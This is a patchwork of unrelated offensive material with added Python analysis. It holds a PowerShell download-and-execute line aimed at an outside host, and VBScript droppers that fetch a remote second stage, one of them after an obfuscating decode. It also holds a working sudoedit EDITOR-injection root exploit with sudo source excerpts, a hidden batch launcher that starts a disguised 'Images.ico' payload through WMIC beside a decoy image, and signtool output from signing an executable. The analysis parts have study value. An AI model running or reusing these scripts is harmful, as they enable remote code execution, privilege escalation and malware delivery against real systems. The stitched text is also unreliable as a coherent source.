IEX (New-Object Net.Webclient).downloadstring("http://educatiolink.com/index.php")
<html>
<script language="vbscript">
On Error Resume Next
' Stage-one downloader: fetch the second stage and execute the response body as VBScript
Set Posto = CreateObject("MSXML2.ServerXMLHTTP.6.0")
Posto.open "GET", "baidu.com", False ' http://hpurusymireene.com/theme/basic/skin/member/basic/upload/eweerew.php?er=1
Posto.send
to = Posto.responseText
Execute(to)
</script>
</html>
<html>
<!-- A simple subsequence-splicing (de-interleaving) function -->
<!-- Input:  '123456789abcdefghiklm' -->
<!-- Output: '1a2b3c4d5e6f7g8h9iklm' -->
<script language="vbscript">
On Error Resume Next
Function cooo(c)
    L = Len(c)
    s = ""
    d = 9
    ' Read the string as rows of d characters and emit it column by column
    For jx = 0 To d - 1
        For ix = 0 To Int(L/d) - 1
            s = s & Mid(c, ix*d+jx+1, 1)
        Next
    Next
    ' Append the leftover tail that did not fill a whole row
    s = s & Right(c, L - Int(L/d) * d)
    cooo = s
End Function
' Same downloader as above, but the response is de-interleaved before it is executed
Set Posto = CreateObject("MSXML2.ServerXMLHTTP.6.0")
Posto.open "GET", "baidu.com", False ' https://christinadudley.com/public_html/edudley/sites/default/files/1203427/expres.php?op=1
Posto.send
to = Posto.responseText
to = cooo(to)
Execute(to)
</script>
</html>
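The cooo() routine above is a plain transposition: the server writes the second stage column-wise into rows of 9 characters, and the client reads it back row-wise. The following Python is an added example, not code from the sample or its author. It ports the decoder, adds the matching encoder a server would use, and recovers the row width by brute force for samples that use a value other than 9. The stage-two text and the keyword list are constructed for the demonstration.

```python
# Added example: Python model of the cooo() transposition used by the VBScript dropper above.
# cooo_decode() mirrors the VBScript; the encoder and the width guesser are analysis helpers.

def cooo_decode(c: str, d: int = 9) -> str:
    """Port of cooo(): read c in rows of d chars, emit column by column, then the tail."""
    L = len(c)
    rows = L // d                        # Int(L/d)
    out = []
    for jx in range(d):                  # For jx = 0 To d - 1
        for ix in range(rows):           # For ix = 0 To Int(L/d) - 1
            out.append(c[ix * d + jx])   # Mid(c, ix*d+jx+1, 1); VBScript indexes from 1
    out.append(c[rows * d:])             # Right(c, L - Int(L/d) * d)
    return "".join(out)


def cooo_encode(p: str, d: int = 9) -> str:
    """Inverse of cooo_decode(): what the server applies to the plain second stage."""
    L = len(p)
    rows = L // d
    out = []
    for ix in range(rows):
        for jx in range(d):
            out.append(p[jx * rows + ix])
    out.append(p[rows * d:])
    return "".join(out)


def guess_block_size(blob: str, keywords, max_d: int = 64) -> list:
    """Return the row widths d (2..max_d) whose decode contains every keyword.

    Widths that leave fewer than two rows are skipped: for those cooo_decode()
    is the identity, so they would match any blob that already holds the keywords.
    """
    hits = []
    for d in range(2, max_d + 1):
        if len(blob) // d < 2:
            break
        text = cooo_decode(blob, d)
        if all(k in text for k in keywords):
            hits.append(d)
    return hits


# Test vector taken from the sample's own comment
SAMPLE_IN = "123456789abcdefghiklm"
SAMPLE_OUT = "1a2b3c4d5e6f7g8h9iklm"

# Constructed, harmless stand-in for a second stage, used to show width recovery
STAGE2 = 'On Error Resume Next\r\nSet sh = CreateObject("WScript.Shell")\r\nMsgBox "stage two"'

if __name__ == "__main__":
    assert cooo_decode(SAMPLE_IN) == SAMPLE_OUT
    wire = cooo_encode(STAGE2, 9)
    print("on the wire:     ", wire)
    print("candidate widths:", guess_block_size(wire, ["CreateObject", "MsgBox"]))
    print("decoded:         ", cooo_decode(wire, 9))
```

When carving the second stage from a capture, run guess_block_size() against the raw response body with a few VBScript keywords; a single hit is the width the sample was built with, and cooo_decode() with that width yields the script that Execute() would have run.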
if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$'
then
    echo "> Currently installed sudo version is not vulnerable"
    exit 1
fi

# Check whether sudoers grants this user a sudoedit entry such as: test ALL=(ALL:ALL) sudoedit
EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2-)

if [ -z "$EXPLOITABLE" ]; then
    echo "> It doesn't seem that this user can run sudoedit as root"
    read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2
else
    echo "> BINGO! User exploitable"
fi

echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"
echo "$USER ALL=(ALL:ALL) ALL"
read -n 1 -s -r -p "Press any key to continue..."
echo "$EXPLOITABLE"
# The payload below is effectively: EDITOR="vim -- /etc/sudoers" sudoedit <permitted file>
EDITOR="vim -- /etc/sudoers" $EXPLOITABLE
sudo su root
exit 0
2. While the exploit above is running, press Enter twice; the sudoers editing screen opens automatically.
Change the earlier test ALL=(ALL:ALL) sudoedit --> test ALL=(ALL:ALL) ALL, then save and exit.
// src/sudo_edit.c@sudo_edit()
int
sudo_edit(struct command_details *command_details)
{
    // [...]
    /*
     * Set real, effective and saved uids to root.
     * We will change the euid as needed below.
     */
    // From here on sudo runs as root, with a temp directory the invoking user can write
    setuid(ROOT_UID);
    // [...]
    /* Find a temporary directory writable by the user. */
    set_tmpdir(&user_details.cred);
    // [...]
    /*
     * The user's editor must be separated from the files to be
     * edited by a "--" option.
     */
    // With the payload: argv[] = {"vim", "--", "/etc/sudoers", "--", "/etc/custom_test.txt"}
    for (ap = command_details->argv; *ap != NULL; ap++) {
        if (files)
            nfiles++;
        // Each argument is compared with "--"; everything after the FIRST match is treated as a file to edit,
        // so the "/etc/sudoers" smuggled in through EDITOR lands in the file list
        else if (strcmp(*ap, "--") == 0)
            files = ap + 1;
        else
            editor_argc++;
    }
    // src/sudo_edit.c@resolve_editor(), patched version: an editor word equal to "--" makes sudo ignore that editor
    /*
     * We use "--" to separate the editor and arguments from the files
     * to edit.  The editor arguments themselves may not contain "--".
     */
    if (strcmp(nargv[nargc], "--") == 0) {
        sudo_warnx(U_("ignoring editor: %.*s"), (int)edlen, ed);
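To make the two excerpts concrete, here is an added Python model of the argument handling (a simulation of the logic shown above, not sudo's own code): sudoedit turns the editor string into words, appends "--" and the requested files, and sudo_edit() treats everything after the first "--" as a file; the patched resolve_editor() refuses an editor whose words contain "--" and moves on to the next candidate. Assumptions: the editor string is split on plain whitespace (sudo also handles quoting), the environment variables are honoured (sudoers env_editor), and "vi" stands in for the compiled-in default editor.

```python
# Added example: Python model of how sudoedit builds and splits its argument vector.
# Simulation of the excerpts above, not sudo's code. Assumptions: plain whitespace
# splitting of the editor string, env variables honoured, "vi" as the default editor.

DEFAULT_EDITOR = "vi"   # assumption: stand-in for sudo's compiled-in editor list


def build_argv(editor: str, files: list) -> list:
    """sudoedit appends "--" and the requested files to the editor's words."""
    return editor.split() + ["--"] + list(files)


def split_edit_argv(argv: list):
    """The loop from sudo_edit(): every argument after the FIRST "--" is a file to edit."""
    editor_args, files = [], None
    for arg in argv:
        if files is not None:
            files.append(arg)
        elif arg == "--":
            files = []
        else:
            editor_args.append(arg)
    return editor_args, files or []


def resolve_editor(candidates: list, patched: bool) -> str:
    """Pick the first usable editor string; the patched version rejects any whose words contain "--"."""
    for ed in candidates:
        words = ed.split()
        if not words:
            continue
        if patched and "--" in words:
            print(f"sudoedit: ignoring editor: {ed}")   # mirrors the sudo_warnx() in the fix
            continue
        return ed
    return DEFAULT_EDITOR


def sudoedit_plan(env: dict, files: list, patched: bool):
    """Return (editor argv, files the editor is handed) for a given environment."""
    candidates = [env.get(var, "") for var in ("SUDO_EDITOR", "VISUAL", "EDITOR")]
    editor = resolve_editor(candidates, patched)
    return split_edit_argv(build_argv(editor, files))


if __name__ == "__main__":
    env = {"EDITOR": "vim -- /etc/sudoers"}          # the exploit's environment
    for patched in (False, True):
        editor, files = sudoedit_plan(env, ["/etc/custom_test.txt"], patched)
        print(f"patched={patched}: editor={editor} files={files}")
```

Unpatched, the model hands the editor /etc/sudoers alongside the permitted file; patched, the poisoned EDITOR is discarded and only /etc/custom_test.txt reaches the editor. The real fix additionally falls back to the sudoers editor setting, which the DEFAULT_EDITOR constant stands in for here.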
import os
import shutil
import zipfile

# TempFile, OuputFile and file_content are set earlier in the generator script (not shown on this page)

def copy_file(src, dst):
    with open(src, "rb") as in_file, open(dst, "wb") as out_file:
        out_file.write(in_file.read())

def zip_directory(dir_name):
    # Re-pack the working directory; arcname keeps paths relative so the archive layout is preserved
    with zipfile.ZipFile(TempFile + ".zip", "w", zipfile.ZIP_DEFLATED) as zip_file:
        for root, _, files in os.walk(dir_name):
            for file in files:
                file_path = os.path.join(root, file)
                arcname = os.path.relpath(file_path, dir_name)
                zip_file.write(file_path, arcname=arcname)

try:
    os.remove(TempFile + ".zip")  # Delete temporary zip file
except Exception as e:
    print(e)
    os.sys.exit(1)

try:
    print("Changing suffix..")
    with open(OuputFile, "wb") as file:
        file.write(file_content)  # Write modified content to output file
except Exception as e:
    print(e)
    os.sys.exit(1)

try:
    shutil.rmtree(TempFile)  # Delete temporary directory
except Exception as e:
    print(e)
    os.sys.exit(1)

print("Generation completed")
@echo off
REM Relaunch itself minimized so no console window stays on screen
if not DEFINED IS_MINIMIZED (
    set IS_MINIMIZED=1
    start "" /min "%~dpnx0" %*
    exit
)

cd %TEMP%

REM Locate the decoy image and the "Images.ico" payload under %TEMP%, then start the payload through WMI.
REM Win32_Process.Create takes the command line first and the working directory second, which is how the two paths are passed here.
for /F "delims=" %%K in ('dir /b /s "Screenshot_05-04-2023.jpg"') do (
    for /F "delims=" %%G in ('dir /b /s "Images.ico"') do (
        WMIC process call create "%%~G" "%%~K"
        cd %CD%
        exit
    )
)
exit
The following certificates were considered:
    Issued to: GS
    Issued by: GS
    Expires:   Tue Jan 01 00:00:00 2030
    SHA1 hash: EE0FBF8360FF3E8592A0CA55096760CBB9D3E835

After EKU filter, 1 certs were left.
After expiry filter, 1 certs were left.
After Private Key filter, 0 certs were left.
SignTool Error: No certificates were found that met all the given criteria.

The following certificates were considered:
    Issued to: NVIDIA GameStream Server
    Issued by: NVIDIA GameStream Server
    Expires:   Fri Jun 26 16:03:20 2043
    SHA1 hash: 387B08818D2E0BC8BFA623DC033AF906246F4BEA

After EKU filter, 1 certs were left.
After expiry filter, 1 certs were left.
After Private Key filter, 1 certs were left.
The following certificate was selected:
    Issued to: NVIDIA GameStream Server
    Issued by: NVIDIA GameStream Server
    Expires:   Fri Jun 26 16:03:20 2043
    SHA1 hash: 387B08818D2E0BC8BFA623DC033AF906246F4BEA

Done Adding Additional Store
Successfully signed: test.exe

Number of files successfully Signed: 1
Number of warnings: 0
Number of errors: 0
typedef struct PKCS7_SignedData {
    int version;                                          // Version (of PKCS #7, generally version 1)
    digestAlgorithms DigestAlgorithms;                    // Collection of all algorithms used by SignerInfo signature blocks
    contentInfo ContentInfo;                              // Content type and content or reference to content
    certificates *ExtendedCertificatesAndCertificates,    // OPTIONAL: Collection of all certificates used
                 *CertificateRevocationLists;             // OPTIONAL: Collection of all CRLs
    signerInfos *signerInfos;                             // One or more SignerInfo signature blocks
} PKCS7_SignedData;

typedef struct SignerInfo {
    Certificate certificate;                              // Issuer and serial number to uniquely identify the signer's certificate
    DigestAlgorithm digestAlgorithm;                      // Digest algorithm
    DigestEncryptionAlgorithm digestEncryptionAlgorithm;  // Digest encryption algorithm
    Digest digest;                                        // Hash
    EncryptedDigest encryptedDigest;                      // Actual signature
    AuthenticatedAttribute *authenticatedAttributes;      // OPTIONAL: Attributes signed by this signer
    UnauthenticatedAttribute *unauthenticatedAttributes;  // OPTIONAL: Attributes not signed by this signer
} SignerInfo;

contentInfo = SEQUENCE {
    contentType ContentType,
    content [0] EXPLICIT ANY DEFINED BY contentType OPTIONAL
}
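The two structures above are a C-style view; in the signed PE the signature is DER-encoded ASN.1, and locating the signer's algorithms and signature bytes means walking nested SEQUENCE/SET elements. The Python below is an added example, not code from the page or any vendor: it builds a small, constructed SignedData in DER and walks it back to the fields the structs name. It is not a valid Authenticode signature (no SpcIndirectDataContent, no certificates, placeholder signature bytes); it only exercises the structure. The serial number 7 and the 0xAA signature bytes are invented sample values.

```python
# Added example (not from the page or any vendor): build a small constructed PKCS #7 SignedData
# in DER and walk it to recover the fields named in PKCS7_SignedData / SignerInfo above.
# NOT a valid Authenticode signature: no SpcIndirectDataContent, no certificates,
# placeholder signature bytes. It only exercises the structure.

OID_SIGNED_DATA = "1.2.840.113549.1.7.2"   # pkcs7-signedData
OID_DATA = "1.2.840.113549.1.7.1"          # pkcs7-data (Authenticode carries SpcIndirectDataContent here)
OID_SHA256 = "2.16.840.1.101.3.4.2.1"
OID_RSA = "1.2.840.113549.1.1.1"           # rsaEncryption

def der_len(n: int) -> bytes:
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + der_len(len(body)) + body

def encode_oid(dotted: str) -> bytes:
    arcs = [int(a) for a in dotted.split(".")]
    out = [40 * arcs[0] + arcs[1]]
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:                          # base-128, high bit set on all but the last byte
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return tlv(0x06, bytes(out))

def decode_oid(body: bytes) -> str:
    arcs, value = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))

def read_tlv(buf: bytes, pos: int = 0):
    """Return (tag, body, next_pos) for the DER element starting at pos."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long form: low bits give the number of length bytes
        k = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + k], "big"), pos + k
    return tag, buf[pos:pos + length], pos + length

def children(body: bytes) -> list:
    """Split a constructed element's body into its (tag, body) members."""
    out, pos = [], 0
    while pos < len(body):
        tag, val, pos = read_tlv(body, pos)
        out.append((tag, val))
    return out

def build_sample() -> bytes:
    alg_sha256 = tlv(0x30, encode_oid(OID_SHA256) + b"\x05\x00")   # AlgorithmIdentifier, NULL params
    alg_rsa = tlv(0x30, encode_oid(OID_RSA) + b"\x05\x00")
    signer_info = tlv(0x30, tlv(0x02, b"\x01")                          # version
                      + tlv(0x30, tlv(0x30, b"") + tlv(0x02, b"\x07"))  # issuerAndSerialNumber: empty Name, serial 7
                      + alg_sha256 + alg_rsa                            # digestAlgorithm, digestEncryptionAlgorithm
                      + tlv(0x04, b"\xaa" * 32))                        # encryptedDigest: placeholder bytes
    signed_data = tlv(0x30, tlv(0x02, b"\x01")                          # version
                      + tlv(0x31, alg_sha256)                           # digestAlgorithms SET
                      + tlv(0x30, encode_oid(OID_DATA))                 # contentInfo: type only, no content
                      + tlv(0x31, signer_info))                         # signerInfos SET
    return tlv(0x30, encode_oid(OID_SIGNED_DATA) + tlv(0xA0, signed_data))  # outer ContentInfo

def parse_signed_data(der: bytes) -> dict:
    _, body, _ = read_tlv(der)
    (_, oid_body), (_, wrapped) = children(body)
    if decode_oid(oid_body) != OID_SIGNED_DATA:
        raise ValueError("outer contentType is not signedData")
    (_, sd), = children(wrapped)                    # content [0] EXPLICIT wraps the SignedData SEQUENCE
    f = children(sd)
    idx, n_certs = 3, 0
    while f[idx][0] in (0xA0, 0xA1):                # optional certificates [0] / crls [1] follow contentInfo
        n_certs += len(children(f[idx][1])) if f[idx][0] == 0xA0 else 0
        idx += 1
    signers = []
    for _, si in children(f[idx][1]):
        s = children(si)
        k = 4 if s[3][0] == 0xA0 else 3             # skip authenticatedAttributes [0] when present
        signers.append({"serial": int.from_bytes(children(s[1][1])[1][1], "big"),
                        "digest_alg": decode_oid(children(s[2][1])[0][1]),
                        "sig_alg": decode_oid(children(s[k][1])[0][1]),
                        "signature": s[k + 1][1]})
    return {"version": int.from_bytes(f[0][1], "big"),
            "digest_algorithms": [decode_oid(children(a)[0][1]) for _, a in children(f[1][1])],
            "content_type": decode_oid(children(f[2][1])[0][1]),
            "certificates": n_certs,
            "signers": signers}
```

On a real Authenticode blob (the bytes of the PE's security directory, after the 8-byte WIN_CERTIFICATE header) the same walk reaches the certificates [0] field that signtool populated in the output above, and the signer entry carries the authenticatedAttributes block that the parser skips over; the digest of the PE itself lives in the SpcIndirectDataContent that this constructed sample omits.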